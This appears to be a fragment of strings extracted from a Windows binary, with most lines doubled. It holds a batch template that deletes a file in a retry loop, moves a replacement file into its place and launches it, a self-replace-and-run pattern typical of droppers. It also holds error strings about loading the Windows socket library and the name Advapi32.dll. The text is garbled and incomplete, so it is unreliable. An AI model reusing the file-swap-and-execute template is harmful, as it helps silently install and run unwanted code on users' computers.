set fl="%s"
del /q %%fl%%
del /q %%fl%%
if exist %%fl%% goto dl
if exist %%fl%% goto dl
move /y "%s" %%fl%%
move /y "%s" %%fl%%
start "" %%fl%%
start "" %%fl%%
Error loading Socket interface (ws2_32.dll)!
Error loading Socket interface (ws2_32.dll)!
Advapi32.dll
Advapi32.dll